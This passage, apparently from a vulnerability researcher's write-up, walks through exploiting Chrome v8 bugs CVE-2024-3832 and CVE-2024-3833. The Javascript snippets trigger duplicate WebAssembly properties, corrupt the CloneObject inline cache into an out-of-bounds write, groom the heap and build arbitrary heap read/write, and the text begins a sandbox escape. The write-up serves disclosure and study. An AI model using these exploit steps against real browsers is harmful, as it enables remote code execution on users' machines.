In particular, the code that creates the Exception property uses an internal function that assumes the Exception property does not yet exist in the WebAssembly object. If the user created the Exception property prior to activating the trial, then Chrome would try to create another Exception property in WebAssembly. This could produce two duplicate Exception properties in WebAssembly with different values, which could then be used to cause a type confusion in the Exception property and ultimately be exploited to gain RCE.


WebAssembly.Exception = 1.1;
...
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content = token; 
document.head.appendChild(meta);  //<---- creates duplicate Exception property
...

What actually happens with CVE-2021-30561 is more complicated, because the code that enables the WebAssembly Exception Handling feature does check that the WebAssembly object does not already contain a property named Exception. The check used there, however, is not sufficient and was bypassed in CVE-2021-30561 by using the Javascript Proxy object. For details of how this bypass and exploit work, I’ll refer readers to the original bug ticket.
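For contrast, here is the invariant that these duplicate-property bugs violate, sketched in plain Javascript (nothing here is v8-specific):

```javascript
// From spec-compliant Javascript, assigning to an existing key always
// overwrites the same slot: an object can never end up with two own
// properties sharing a name. The bugs below break exactly this invariant
// from native code.
const o = {};
o.Exception = 1.1;
o.Exception = {}; // overwrites, never duplicates
const names = Object.getOwnPropertyNames(o).filter((k) => k === "Exception");
console.log(names.length); // 1
```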

Another day, another bypass

Javascript Promise Integration is a WebAssembly feature that is currently in an origin trial (until October 29, 2024). Similar to the WebAssembly Exception Handling feature, it defines properties on the WebAssembly object when an origin trial token is detected by calling InstallConditionalFeatures:


void WasmJs::InstallConditionalFeatures(Isolate* isolate,
                                        Handle<NativeContext> context) {
   ...
  // Install JSPI-related features.
  if (isolate->IsWasmJSPIEnabled(context)) {
    Handle<String> suspender_string = v8_str(isolate, "Suspender");
    if (!JSObject::HasRealNamedProperty(isolate, webassembly, suspender_string)  //<--- 1.
             .FromMaybe(true)) {
      InstallSuspenderConstructor(isolate, context);
    }

    // Install Wasm type reflection features (if not already done).
    Handle<String> function_string = v8_str(isolate, "Function");
    if (!JSObject::HasRealNamedProperty(isolate, webassembly, function_string)   //<--- 2.
             .FromMaybe(true)) {
      InstallTypeReflection(isolate, context);
    }
  }
}

When adding Javascript Promise Integration (JSPI), the code above checks whether webassembly already has the properties Suspender and Function (1. and 2. in the above); if not, it creates these properties using InstallSuspenderConstructor and InstallTypeReflection respectively. The function InstallSuspenderConstructor uses InstallConstructorFunc to create the Suspender property on the WebAssembly object:


void WasmJs::InstallSuspenderConstructor(Isolate* isolate,
                                         Handle<NativeContext> context) {
  Handle<JSObject> webassembly(context->wasm_webassembly_object(), isolate);  //<--- 3.
  Handle<JSFunction> suspender_constructor = InstallConstructorFunc(
      isolate, webassembly, "Suspender", WebAssemblySuspender);
  ...
}

The problem is, in InstallSuspenderConstructor, the WebAssembly object comes from the wasm_webassembly_object property of context (3. in the above), while the WebAssembly object that is checked in InstallConditionalFeatures comes from the property WebAssembly of the global object (which is the same as the global WebAssembly variable):


void WasmJs::InstallConditionalFeatures(Isolate* isolate,
                                        Handle<NativeContext> context) {
  Handle<JSGlobalObject> global = handle(context->global_object(), isolate);
  // If some fuzzer decided to make the global object non-extensible, then
  // we can't install any features (and would CHECK-fail if we tried).
  if (!global->map()->is_extensible()) return;

  MaybeHandle<Object> maybe_wasm =
      JSReceiver::GetProperty(isolate, global, "WebAssembly");

The global WebAssembly variable can be changed to any user defined object by using Javascript:


WebAssembly = {}; //<---- changes the WebAssembly global variable

While this changes the value of WebAssembly, the wasm_webassembly_object cached in context is not affected. It is therefore possible to first define a Suspender property on the WebAssembly object, then set the WebAssembly variable to a different object and then activate the Javascript Promise Integration origin trial to create a duplicate Suspender in the original WebAssembly object:


WebAssembly.Suspender = {};
delete WebAssembly.Suspender;
WebAssembly.Suspender = 1;
//stores the original WebAssembly object in oldWebAssembly
var oldWebAssembly = WebAssembly;
var newWebAssembly = {};
WebAssembly = newWebAssembly;
//Activate trial
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content = token; 
document.head.appendChild(meta);  //<---- creates duplicate Suspender property in oldWebAssembly
%DebugPrint(oldWebAssembly);

When the origin trial is triggered, InstallConditionalFeatures first checks that the Suspender property is absent from the WebAssembly global variable (which is newWebAssembly in the above). It then proceeds to create the Suspender property in context->wasm_webassembly_object (which is oldWebAssembly in the above). Doing so creates a duplicate Suspender property in oldWebAssembly, much like what happened in CVE-2021-30561.


DebugPrint: 0x2d5b00327519: [JS_OBJECT_TYPE] in OldSpace
 - map: 0x2d5b00387061  [DictionaryProperties]
 - prototype: 0x2d5b003043e9 
 - elements: 0x2d5b000006f5  [HOLEY_ELEMENTS]
 - properties: 0x2d5b0034a8fd 
 - All own properties (excluding elements): {
   ...
   Suspender: 0x2d5b0039422d  (data, dict_index: 20, attrs: [W_C])
   ...
   Suspender: 1 (data, dict_index: 19, attrs: [WEC])

This causes oldWebAssembly to have 2 Suspender properties that are stored at different offsets. I reported this issue as 331358160 and it was assigned CVE-2024-3832.

The function InstallTypeReflection suffers from a similar problem but has some extra issues:


void WasmJs::InstallTypeReflection(Isolate* isolate,
                                   Handle<NativeContext> context) {
  Handle<JSObject> webassembly(context->wasm_webassembly_object(), isolate);

#define INSTANCE_PROTO_HANDLE(Name) \
  handle(JSObject::cast(context->Name()->instance_prototype()), isolate)
  ...
  InstallFunc(isolate, INSTANCE_PROTO_HANDLE(wasm_tag_constructor), "type",  //<--- 1.
              WebAssemblyTableType, 0, false, NONE,
              SideEffectType::kHasNoSideEffect);
  ...
#undef INSTANCE_PROTO_HANDLE
}

The function InstallTypeReflection also defines a type property on various other objects. For example, in 1., the property type is created on the prototype object of the wasm_tag_constructor, without checking whether the property already exists:


var x = WebAssembly.Tag.prototype;
x.type = {};
meta = document.createElement('meta');
meta.httpEquiv = 'Origin-Trial';
meta.content = token;
document.head.appendChild(meta);  //<--- creates duplicate type property on x

This then allows duplicate type properties to be created on WebAssembly.Tag.prototype. This issue was reported as 331383939 and was assigned CVE-2024-3833.

A new exploit

The exploit for CVE-2021-30561 relies on creating duplicate properties of “fast objects.” In v8, fast objects store their properties in an array (some properties are also stored inside the object itself). However, a hardening patch has since landed, which checks for duplicates when adding properties to a fast object. As such, it is no longer possible to create fast objects with duplicate properties.

It is, however, still possible to use the bug to create duplicate properties in “dictionary objects.” In v8, property dictionaries are implemented as NameDictionary. The underlying storage of a NameDictionary is implemented as an array, with each element being a tuple of the form (Key, Value, Attribute), where Key is the name of the property. When adding a property to the NameDictionary, the next free entry in the array is used to store this new tuple. With the bug, it is possible to create different entries in the property dictionary with a duplicate Key. In the report of CVE-2023-2935, Sergei Glazunov showed how to exploit the duplicate property primitive with dictionary objects. This, however, relies on being able to create the duplicate property as an AccessorInfo property, which is a special kind of property in v8 that is normally reserved for builtin objects. This, again, is not possible in the current case. So, I need to find a new way to exploit this issue.
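As a toy model of that storage layout (purely illustrative; the tuple shape and attribute strings are assumptions, not real v8 structures):

```javascript
// NameDictionary-style storage: a flat array of (key, value, attributes)
// tuples, appended in insertion order. Nothing in the format itself
// prevents two entries from sharing a key -- deduplication is the
// responsibility of the code that adds properties, which is exactly
// what the bug bypasses.
const dict = [];
function addEntry(key, value, attrs) {
  dict.push([key, value, attrs]); // next free entry, no duplicate check
}
addEntry("Suspender", 1, "WEC");
addEntry("Suspender", {}, "W_C"); // duplicate key: two live entries
const dupes = dict.filter(([k]) => k === "Suspender");
console.log(dupes.length); // 2
```

Which of the two entries a lookup returns then depends on the iteration order of the consuming code, and that ambiguity is what the rest of the exploit leans on.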

The idea is to look for some internal functions or optimizations that will go through all the properties of an object, but not expect properties to be duplicated. One such optimization that comes to mind is object cloning.

Attack of the clones

When an object is copied using the spread syntax, a shallow copy of the original object is created:


const clonedObj = { ...obj1 };
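"Shallow" here is directly observable from plain Javascript (no assumptions): top-level data properties are copied by value, while nested objects remain shared:

```javascript
const inner = { n: 1 };
const obj1 = { a: 1, inner };
const clonedObj = { ...obj1 };

clonedObj.a = 2;
console.log(obj1.a); // 1 -- top-level property was copied

clonedObj.inner.n = 99;
console.log(obj1.inner.n); // 99 -- nested object is shared
```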

In v8, this is implemented as the CloneObject bytecode:


0x39b300042178 @    0 : 80 00 00 29       CreateObjectLiteral [0], [0], #41
...
0x39b300042187 @   15 : 82 f7 29 05       CloneObject r2, #41, [5]
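A minimal driver that exercises this bytecode repeatedly might look as follows (a sketch: the inline-cache behavior is internal to v8 and produces no observable difference from Javascript):

```javascript
function clone(o) {
  return { ...o }; // compiles to CreateObjectLiteral + CloneObject
}
// Every source object here has the same shape (map), so after the first
// clone (an inline cache miss), later clones can take a cached handler path.
for (let i = 0; i < 1000; i++) {
  clone({ a: 1, b: 2 });
}
console.log(JSON.stringify(clone({ a: 1, b: 2 }))); // {"a":1,"b":2}
```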

When a function containing this bytecode is first run, inline cache code is generated and used to handle the bytecode in subsequent calls. While handling the bytecode, the inline cache code also collects information about the input object (obj1) and generates optimized inline cache handlers for inputs of the same type. On the first run, there is no information about previous input objects and no cached handler is available, so an inline cache miss is detected and CloneObjectIC_Miss is used to handle the bytecode.

To understand how the CloneObject inline cache works and how it is relevant to the exploit, I’ll recap some basics of object types and properties in v8. Javascript objects in v8 store a map field that specifies the type of the object and, in particular, how properties are stored in the object:


x = { a : 1};
x.b = 1;
%DebugPrint(x);

The output of %DebugPrint is as follows:


DebugPrint: 0x1c870020b10d: [JS_OBJECT_TYPE]
 - map: 0x1c870011afb1  [FastProperties]
 ...
 - properties: 0x1c870020b161 <PropertyArray[3]>
 - All own properties (excluding elements): {
    0x1c8700002ac1: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
    0x1c8700002ad1: [String] in ReadOnlySpace: #b: 1 (const data field 1), location: properties[0]
 }

We see that x has two properties—one (a) stored in the object and the other (b) stored in a PropertyArray. Note that the length of the PropertyArray is 3 (PropertyArray[3]), while only one property is stored in the PropertyArray. The length of a PropertyArray is like the capacity of a std::vector in C++. Having a slightly bigger capacity avoids having to extend and reallocate the PropertyArray every time a new property is added to the object.

The map of the object uses the fields inobject_properties and unused_property_fields to indicate how many properties are stored in the object and how much space is left in the PropertyArray. In this case, we have 2 free spaces (3 (PropertyArray length) - 1 (property in the array) = 2).


0x1c870011afb1: [Map] in OldSpace
 - map: 0x1c8700103c35 <MetaMap (0x1c8700103c85 )>
 - type: JS_OBJECT_TYPE
 - instance size: 16
 - inobject properties: 1
 - unused property fields: 2
...

When a cache miss happens, CloneObjectIC_Miss first tries to determine whether the result of the clone (the target) can use the same map as the original object (the source) by examining the map of the source object using GetCloneModeForMap (1. in the following):


RUNTIME_FUNCTION(Runtime_CloneObjectIC_Miss) {
  HandleScope scope(isolate);
  DCHECK_EQ(4, args.length());
  Handle<Object> source = args.at(0);
  int flags = args.smi_value_at(1);

  if (!MigrateDeprecated(isolate, source)) {
        ...
        FastCloneObjectMode clone_mode =
            GetCloneModeForMap(source_map, flags, isolate);  //<--- 1.
        switch (clone_mode) {
          case FastCloneObjectMode::kIdenticalMap: {
            ...
          }
          case FastCloneObjectMode::kEmptyObject: {
            ...
          }
          case FastCloneObjectMode::kDifferentMap: {
            ...
          }
          ...
        }
     ...
  }
  ...
}

The case that is relevant to us is the FastCloneObjectMode::kDifferentMap mode.


case FastCloneObjectMode::kDifferentMap: {
  Handle<Object> res;
  ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
      isolate, res, CloneObjectSlowPath(isolate, source, flags));   //<----- 1.
  Handle<Map> result_map(Handle<HeapObject>::cast(res)->map(),
                         isolate);
  if (CanFastCloneObjectWithDifferentMaps(source_map, result_map,
                                          isolate)) {
    ...
    nexus.ConfigureCloneObject(source_map,                          //<----- 2.
                               MaybeObjectHandle(result_map));
...

In this mode, a shallow copy of the source object is first made via the slow path (1. in the above). The handler of the inline cache is then encoded as a pair of maps consisting of the map for the source and target objects respectively (2. in the above).

From now on, if another object with the source_map is being cloned, the inline cache handler is used to clone the object. Essentially, the source object is copied as follows:

  1. Make a copy of the PropertyArray of the source object:

    
      TNode<PropertyArray> source_property_array = CAST(source_properties);
    
      TNode<IntPtrT> length = LoadPropertyArrayLength(source_property_array);
          GotoIf(IntPtrEqual(length, IntPtrConstant(0)), &allocate_object);
    
      TNode<PropertyArray> property_array = AllocatePropertyArray(length);
          FillPropertyArrayWithUndefined(property_array, IntPtrConstant(0), length);
          CopyPropertyArrayValues(source_property_array, property_array, length,
                                  SKIP_WRITE_BARRIER, DestroySource::kNo);
          var_properties = property_array;
    
  2. Allocate the target object and use result_map as its map.

    
      TNode<JSObject> object = UncheckedCast<JSObject>(AllocateJSObjectFromMap(
            result_map.value(), var_properties.value(), var_elements.value(),
            AllocationFlag::kNone,
            SlackTrackingMode::kDontInitializeInObjectProperties));
    
  3. Copy the in-object properties from source to target.

    
        BuildFastLoop<IntPtrT>(
            result_start, result_size,
            [=](TNode<IntPtrT> field_index) {
              ...
              StoreObjectFieldNoWriteBarrier(object, result_offset, field);
            },
            1, LoopUnrollingMode::kYes, IndexAdvanceMode::kPost);
    

What happens if I try to clone an object that has a duplicated property? When the code is first run, CloneObjectSlowPath is called to allocate the target object and then copy each property from the source to the target. However, the code in CloneObjectSlowPath handles duplicate properties properly, so when the duplicated property in the source is encountered, the existing property in the target is overwritten instead of a duplicate being created. For example, if my source object has the following layout:


DebugPrint: 0x38ea0031b5ad: [JS_OBJECT_TYPE] in OldSpace
 - map: 0x38ea00397745  [FastProperties]
 ...
 - properties: 0x38ea00355e85 <PropertyArray[4]>
 - All own properties (excluding elements): {
    0x38ea00004045: [String] in ReadOnlySpace: #type: 0x38ea0034b171  (const data field 0), location: in-object
    0x38ea0038257d: [String] in OldSpace: #a1: 1 (const data field 1), location: in-object
    0x38ea0038258d: [String] in OldSpace: #a2: 1 (const data field 2), location: in-object
    0x38ea0038259d: [String] in OldSpace: #a3: 1 (const data field 3), location: in-object
    0x38ea003825ad: [String] in OldSpace: #a4: 1 (const data field 4), location: properties[0]
    0x38ea003825bd: [String] in OldSpace: #a5: 1 (const data field 5), location: properties[1]
    0x38ea003825cd: [String] in OldSpace: #a6: 1 (const data field 6), location: properties[2]
    0x38ea00004045: [String] in ReadOnlySpace: #type: 0x38ea00397499  (const data field 7), location: properties[3]

Which has a PropertyArray of length 4, with a duplicated type as the last property in the PropertyArray. The target resulting from cloning this object will have the first type property overwritten:


DebugPrint: 0x38ea00355ee1: [JS_OBJECT_TYPE]
 - map: 0x38ea003978b9  [FastProperties]
 ...
 - properties: 0x38ea00356001 
 - All own properties (excluding elements): {
    0x38ea00004045: [String] in ReadOnlySpace: #type: 0x38ea00397499  (data field 0), location: in-object
    0x38ea0038257d: [String] in OldSpace: #a1: 1 (const data field 1), location: in-object
    0x38ea0038258d: [String] in OldSpace: #a2: 1 (const data field 2), location: in-object
    0x38ea0038259d: [String] in OldSpace: #a3: 1 (const data field 3), location: in-object
    0x38ea003825ad: [String] in OldSpace: #a4: 1 (const data field 4), location: properties[0]
    0x38ea003825bd: [String] in OldSpace: #a5: 1 (const data field 5), location: properties[1]
    0x38ea003825cd: [String] in OldSpace: #a6: 1 (const data field 6), location: properties[2]

Note that the target has a PropertyArray of length 3 with all three slots occupied (properties #a4..#a6, whose location is in properties). In particular, the target object's map has no unused_property_fields:


0x38ea003978b9: [Map] in OldSpace
 - map: 0x38ea003034b1 <MetaMap (0x38ea00303501 )>
 - type: JS_OBJECT_TYPE
 - instance size: 28
 - inobject properties: 4
 - unused property fields: 0

While this may look like a setback as the duplicated property does not get propagated to the target object, the real magic happens when the inline cache handler takes over. Remember that, when cloning with the inline cache handler, the resulting object has the same map as the target object from CloneObjectSlowPath, while the PropertyArray is a copy of the PropertyArray of the source object. That means the clone target from inline cache handler has the following property layout:


DebugPrint: 0x38ea003565c9: [JS_OBJECT_TYPE]
 - map: 0x38ea003978b9  [FastProperties]
 ...
 - properties: 0x38ea003565b1 
 - All own properties (excluding elements): {
    0x38ea00004045: [String] in ReadOnlySpace: #type: 0x38ea0034b171  (data field 0), location: in-object
    0x38ea0038257d: [String] in OldSpace: #a1: 1 (data field 1), location: in-object
    0x38ea0038258d: [String] in OldSpace: #a2: 1 (data field 2), location: in-object
    0x38ea0038259d: [String] in OldSpace: #a3: 1 (data field 3), location: in-object
    0x38ea003825ad: [String] in OldSpace: #a4: 1 (data field 4), location: properties[0]
    0x38ea003825bd: [String] in OldSpace: #a5: 1 (data field 5), location: properties[1]
    0x38ea003825cd: [String] in OldSpace: #a6: 1 (data field 6), location: properties[2]

Note that it has a PropertyArray of length 4, but only three properties in the array, leaving one unused property. However, its map is the same as the one used by CloneObjectSlowPath (0x38ea003978b9), which has no unused_property_fields:


0x38ea003978b9: [Map] in OldSpace
 - map: 0x38ea003034b1 <MetaMap (0x38ea00303501 )>
 - type: JS_OBJECT_TYPE
 - instance size: 28
 - inobject properties: 4
 - unused property fields: 0

So, instead of getting an object with a duplicated property, I end up with an object that has an inconsistent unused_property_fields and PropertyArray. Now, if I add a new property to this object, a new map will be created to reflect the new property layout of the object. This new map has an unused_property_fields based on the old map, which is calculated in AccountAddedPropertyField. Essentially, if the old unused_property_fields is positive, this decreases the unused_property_fields by one to account for the new property being added. And if the old unused_property_fields is zero, then the new unused_property_fields is set to two, accounting for the fact that the PropertyArray is full and has to be extended.

On the other hand, the decision to extend the PropertyArray is based on its length rather than unused_property_fields of the map:


void MigrateFastToFast(Isolate* isolate, Handle<JSObject> object,
                       Handle<Map> new_map) {
    ...
    // Check if we still have space in the {object}, in which case we
    // can also simply set the map (modulo a special case for mutable
    // double boxes).
    FieldIndex index = FieldIndex::ForDetails(*new_map, details);
    if (index.is_inobject() || index.outobject_array_index() <
                                   object->property_array(isolate)->length()) {
      ...
      object->set_map(*new_map, kReleaseStore);
      return;
    }
    // This migration is a transition from a map that has run out of property
    // space. Extend the backing store.
    int grow_by = new_map->UnusedPropertyFields() + 1;
    ...  

So, if I have an object that has zero unused_property_fields but space left in the PropertyArray (that is, length = existing_property_number + 1), then the PropertyArray will not be extended when I add a new property. So, after adding a new property, the PropertyArray will be full. However, as mentioned before, unused_property_fields is updated independently and will be set to two, as if the PropertyArray had been extended:


DebugPrint: 0x2575003565c9: [JS_OBJECT_TYPE]
 - map: 0x257500397749  [FastProperties]
 ...
 - properties: 0x2575003565b1 
 - All own properties (excluding elements): {
    0x257500004045: [String] in ReadOnlySpace: #type: 0x25750034b171  (data field 0), location: in-object
    0x25750038257d: [String] in OldSpace: #a1: 1 (data field 1), location: in-object
    0x25750038258d: [String] in OldSpace: #a2: 1 (data field 2), location: in-object
    0x25750038259d: [String] in OldSpace: #a3: 1 (data field 3), location: in-object
    0x2575003825ad: [String] in OldSpace: #a4: 1 (data field 4), location: properties[0]
    0x2575003825bd: [String] in OldSpace: #a5: 1 (data field 5), location: properties[1]
    0x2575003825cd: [String] in OldSpace: #a6: 1 (data field 6), location: properties[2]
    0x257500002c31: [String] in ReadOnlySpace: #x: 1 (const data field 7), location: properties[3]
 }
0x257500397749: [Map] in OldSpace
 - map: 0x2575003034b1 <MetaMap (0x257500303501 )>
 - type: JS_OBJECT_TYPE
 - instance size: 28
 - inobject properties: 4
 - unused property fields: 2

This is important because the JIT compiler of v8, TurboFan, uses unused_property_fields to decide whether PropertyArray needs to be extended:


JSNativeContextSpecialization::BuildPropertyStore(
    Node* receiver, Node* value, Node* context, Node* frame_state, Node* effect,
    Node* control, NameRef name, ZoneVector<Node*>* if_exceptions,
    PropertyAccessInfo const& access_info, AccessMode access_mode) {
    ...
    if (transition_map.has_value()) {
      // Check if we need to grow the properties backing store
      // with this transitioning store.
      ...
      if (original_map.UnusedPropertyFields() == 0) {
        DCHECK(!field_index.is_inobject());

        // Reallocate the properties {storage}.
        storage = effect = BuildExtendPropertiesBackingStore(
            original_map, storage, effect, control);

So, by adding new properties via JIT-compiled code to an object that has two unused_property_fields but a full PropertyArray, I'll be able to write out-of-bounds (OOB) past the PropertyArray and overwrite whatever is allocated after it.
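Putting the two code paths side by side, the bookkeeping drift can be sketched as a toy model (my own simplification in Javascript, not V8 code; the grow-by-3 constant is illustrative):

```javascript
// Toy model of the inconsistency: the map's unused_property_fields and
// the real PropertyArray length are updated by independent code paths.
// State of the corrupted clone from the inline cache handler: 7
// properties (4 in-object), a PropertyArray of length 4 holding only 3
// properties, but a map claiming zero unused fields.
const obj = { inobject: 4, numProps: 7, arrayLen: 4, unusedInMap: 0 };

// AccountAddedPropertyField: positive -> minus one, zero -> two.
function accountAddedField(unused) { return unused > 0 ? unused - 1 : 2; }

// Interpreter path: MigrateFastToFast grows the backing store based on
// the PropertyArray *length*, not the map.
function addPropertySlow(o) {
  const outIndex = o.numProps - o.inobject;      // slot of the new property
  if (outIndex >= o.arrayLen) o.arrayLen = outIndex + 1 + o.unusedInMap;
  o.unusedInMap = accountAddedField(o.unusedInMap);
  o.numProps++;
}

// JIT path: TurboFan extends the backing store only when the *map* says
// unused_property_fields == 0.
function addPropertyJit(o) {
  if (o.unusedInMap === 0) o.arrayLen += 3;      // grow (simplified)
  o.unusedInMap = accountAddedField(o.unusedInMap);
  const outIndex = o.numProps - o.inobject;
  o.numProps++;
  return outIndex < o.arrayLen;                  // false => OOB store
}

addPropertySlow(obj);   // array now truly full, but map now says 2 unused
const inBounds = addPropertyJit(obj);
// inBounds is false: the JIT-compiled store lands past the PropertyArray
```

With the first (slow-path) add, slot 3 of the length-4 array is filled without growth while the map's unused_property_fields jumps from 0 to 2; the second (JIT) add then trusts the map, skips the extension, and stores out of bounds.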

Creating a fast object with duplicate properties

In order to cause the OOB write in PropertyArray, I first need to create a fast object with duplicate properties. As mentioned before, a hardening patch has introduced a check for duplicates when adding properties to a fast object, and I therefore cannot create a fast object with duplicate properties directly. The solution is to first create a dictionary object with duplicate properties using the bug, and then change the object into a fast object. To do so, I’ll use WebAssembly.Tag.prototype to trigger the bug:


var x = WebAssembly.Tag.prototype;
x.type = {};
//delete properties results in dictionary object
delete x.constructor;
//Trigger bug to create duplicated type property
...

Once I’ve got a dictionary object with a duplicated property, I can change it to a fast object by using MakePrototypesFast, which can be triggered via property access:


var y = {};
//setting x to the prototype of y
y.__proto__ = x;
//Property access of `y` calls MakePrototypesFast on x
y.a = 1;
z = y.a;

By making x the prototype of an object y and then accessing a property of y, MakePrototypesFast is called to change x into a fast object with duplicate properties. After this, I can clone x to trigger an OOB write in the PropertyArray.

Exploiting OOB write in PropertyArray

To exploit the OOB write in the PropertyArray, let’s first check and see what is allocated after the PropertyArray. Recall that the PropertyArray is allocated in the inline cache handler. From the handler code, I can see that PropertyArray is allocated right before the target object is allocated:


void AccessorAssembler::GenerateCloneObjectIC() {
    ...
      TNode<PropertyArray> property_array = AllocatePropertyArray(length);  //<--- property_array allocated
      ...
      var_properties = property_array;
    }

    Goto(&allocate_object);
    BIND(&allocate_object);
    ...
    TNode<JSObject> object = UncheckedCast<JSObject>(AllocateJSObjectFromMap(  //<--- target object allocated
        result_map.value(), var_properties.value(), var_elements.value(),
        AllocationFlag::kNone,
        SlackTrackingMode::kDontInitializeInObjectProperties));

As v8 allocates objects linearly, an OOB write allows me to alter the internal fields of the target object. To exploit this bug, I'll overwrite the second field of the target object, the properties field, which stores the address of the target object's PropertyArray. This involves creating JIT-compiled functions that add two properties to the target object.


a8 = {c : 1};
...
function transition_store(x) {
  x.a7 = 0x100;
}
function transition_store2(x) {
  x.a8 = a8;
}
... //JIT optimize transition_store and transition_store2
transition_store(obj);
//Causes the object a8 to be interpreted as PropertyArray of obj
transition_store2(obj);

When storing the property a8 to the corrupted object obj, which has an inconsistent PropertyArray and unused_property_fields, the OOB write past the PropertyArray overwrites the properties field of obj with the address of the Javascript object a8. This can then be exploited by carefully arranging objects in the v8 heap. As objects are allocated in the v8 heap linearly, the heap can easily be arranged by allocating objects in order. For example, in the following code:


var a8 = {c : 1};
var a7 = [1,2];

The v8 heap around the object a8 looks as follows:

The left hand side shows the objects a8 and a7. The fields map, properties, and elements are internal fields in the C++ objects that correspond to the Javascript objects. The right hand side represents the view of the memory as the PropertyArray of obj (when the PropertyArray of obj is set to the address of a8).

A PropertyArray has two internal fields, map and length. When the object a8 is type-confused with a PropertyArray, its properties field, which is the address of its PropertyArray, is interpreted as the length of the PropertyArray of obj. As an address is usually a large number, this allows further OOB read and write to the PropertyArray of obj.
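The field overlap can be sketched as follows (my own simplification; the field lists are abbreviated and assume the compressed-pointer object layout described above):

```javascript
// A JSObject and a PropertyArray share the same header offsets, so when
// a8 is reinterpreted as a PropertyArray, the slot holding a8's
// `properties` pointer is read as the fake array's `length`.
const jsObjectFields = ['map', 'properties', 'elements']; // then in-object slots
const propertyArrayFields = ['map', 'length'];            // then property slots

// Which field of a8 overlaps the PropertyArray's length slot:
const lengthSource = jsObjectFields[propertyArrayFields.indexOf('length')];
// lengthSource is 'properties': a heap address, hence a huge fake length
```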

A property ai+3 in the PropertyArray is going to align with the length field of the Array a7. By writing to this property, the length of the Array a7 can be overwritten. This gives me an OOB write in a Javascript array, which can be exploited in a standard way. However, in order to reach the length field, I must keep adding properties to obj, which unfortunately means that I will also overwrite the map, properties and elements fields, ruining the Array a7.

To avoid overwriting the internal fields of a7, I’ll instead create a7 so that its PropertyArray is allocated before it. This can be achieved by creating a7 with cloning:


var obj0 = {c0 : 0, c1 : 1, c2 : 2, c3 : 3};
obj0.c4 = {len : 1};
function clone0(x) {
  return {...x};
}
//run clone0(obj0) a few times to create inline cache handler
...
var a8 = {c : 1};
//inline cache handler used to create a7
var a7 = clone0(obj0);

The object obj0 has five fields, with the last one, c4 stored in the PropertyArray:


DebugPrint: 0xad0004a249: [JS_OBJECT_TYPE]
    ...
    0xad00198b45: [String] in OldSpace: #c4: 0x00ad0004a31d  (const data field 4), location: properties[0]

When cloning obj0 using the inline cache handler in the function clone0, recall that the PropertyArray of the target object (a7 in this case) is allocated first, and therefore the PropertyArray of a7 will be allocated right after the object a8, but before a7:


//address of a8
DebugPrint: 0xad0004a7fd: [JS_OBJECT_TYPE]
//DebugPrint of a7
DebugPrint: 0xad0004a83d: [JS_OBJECT_TYPE]
 - properties: 0x00ad0004a829 
 - All own properties (excluding elements): {
    ...
    0xad00198b45: [String] in OldSpace: #c4: 0x00ad0004a31d  (const data field 4), location: properties[0]
 }

As we can see, the address of a8 is 0xad0004a7fd, while the address of the PropertyArray of a7 is at 0x00ad0004a829, and a7 is at 0xad0004a83d. This leads to the following memory layout:

Memory layout diagram for objects a8 and a7
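As a sanity check, the gaps between these addresses can be computed directly (the gap values below are my own arithmetic on the quoted DebugPrint output):

```javascript
// Tagged addresses from the DebugPrint output above (lower 32 bits).
const a8 = 0x0004a7fd;
const propArrayOfA7 = 0x0004a829;
const a7 = 0x0004a83d;

// a8 sits first, then a7's PropertyArray, then a7 itself.
const gapA8ToArray = propArrayOfA7 - a8;  // 0x2c bytes
const gapArrayToA7 = a7 - propArrayOfA7;  // 0x14 bytes
```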

With this heap layout, I can overwrite the property c4 of a7 by writing to a property ai in obj that aligns to c4. Although map and length of the PropertyArray will also be overwritten, this does not seem to affect property access of a7. I can then create a type confusion between Javascript Object and Array by using optimized property loading in the JIT compiler.


function set_length(x) {
  x.c4.len = 1000;
}

When the function set_length is optimized with a7 as its input x, because the property c4 of a7 is an object that has a constant map (it is always {len : 1}), the map of this property is stored in the map of a7. The JIT compiler makes use of this information to optimize the property access of x.c4.len. As long as the map of x remains the same as the map of a7, x.c4 will have the same map as {len : 1} and therefore the property len of x.c4 can be accessed by using memory offset directly, without checking the map of x.c4. However, by using the OOB write in the PropertyArray to change a7.c4 into a double Array, corrupted_arr, the map of a7 will not change, and the JIT compiled code for set_length will treat a7.c4 as if it still has the same map as {len : 1}, and write directly to the memory offset corresponding to the len property of a7.c4. As a7.c4 is now an Array object, corrupted_arr, this will overwrite the length property of corrupted_arr, which allows me to access corrupted_arr out-of-bounds. Once an OOB access to corrupted_arr is achieved, gaining arbitrary read and write in the v8 heap is rather straightforward. It essentially consists of the following steps:

  1. First, place an Object Array after corrupted_arr, and use the OOB read primitive in corrupted_arr to read the addresses of the objects stored in this array. This allows me to obtain the address of any V8 object.
  2. Place another double array, writeArr after corrupted_arr, and use the OOB write primitive in corrupted_arr to overwrite the element field of writeArr to an object address. Accessing the elements of writeArr then allows me to read/write to arbitrary addresses.
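The two steps above can be sketched as a toy simulation (my assumption: a flat array stands in for the v8 heap and the slot indices are arbitrary; real tagged pointers and object layouts differ):

```javascript
// Toy simulation of addrof + arbitrary r/w from a corrupted array.
const heap = new Float64Array(16);    // pretend linear v8 heap
heap[6] = 0x4a7fd;                    // element of the neighbouring object
                                      // array, holding a victim's address
heap[9] = 0;                          // `elements` slot of writeArr

// corrupted_arr with an overwritten (huge) length: no bounds check.
const corrupted = {
  read: (i) => heap[i],
  write: (i, v) => { heap[i] = v; },
};

// Step 1 (addrof): OOB read the object array's element.
const victimAddr = corrupted.read(6);
// Step 2 (arbitrary r/w): point writeArr's elements at the victim, so
// accessing writeArr's elements reads/writes the victim's memory.
corrupted.write(9, victimAddr);
```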

Bypassing the v8 heap sandbox

The recently introduced v8 heap sandbox isolates the v8 heap from other process memory, such as executable code, and prevents memory corruption within the v8 heap from accessing memory outside of the heap. To gain code execution, a way to escape the heap sandbox is needed. As the bug was reported soon after the Pwn2Own contest, I decided to check the commits to see whether any sandbox escape had been patched as a result of the contest. Sure enough, there was a commit that appeared to fix a heap sandbox escape, which I assume was used by an entry in the Pwn2Own contest.

When creating a WebAssembly.Instance object, objects from Javascript or other WebAssembly modules can be imported and be used in the instance:


const importObject = {
  imports: {
    imported_func(arg) {
      console.log(arg);
    },
  },
};
var mod = new WebAssembly.Module(wasmBuffer);
const instance = new WebAssembly.Instance(mod, importObject);

In this case, the imported_func is imported to the instance and can be called by WebAssembly functions defined in the WebAssembly module that imports them:


(module
  (func $i (import "imports" "imported_func") (param i32))
  (func (export "exported_func")
    i32.const 42
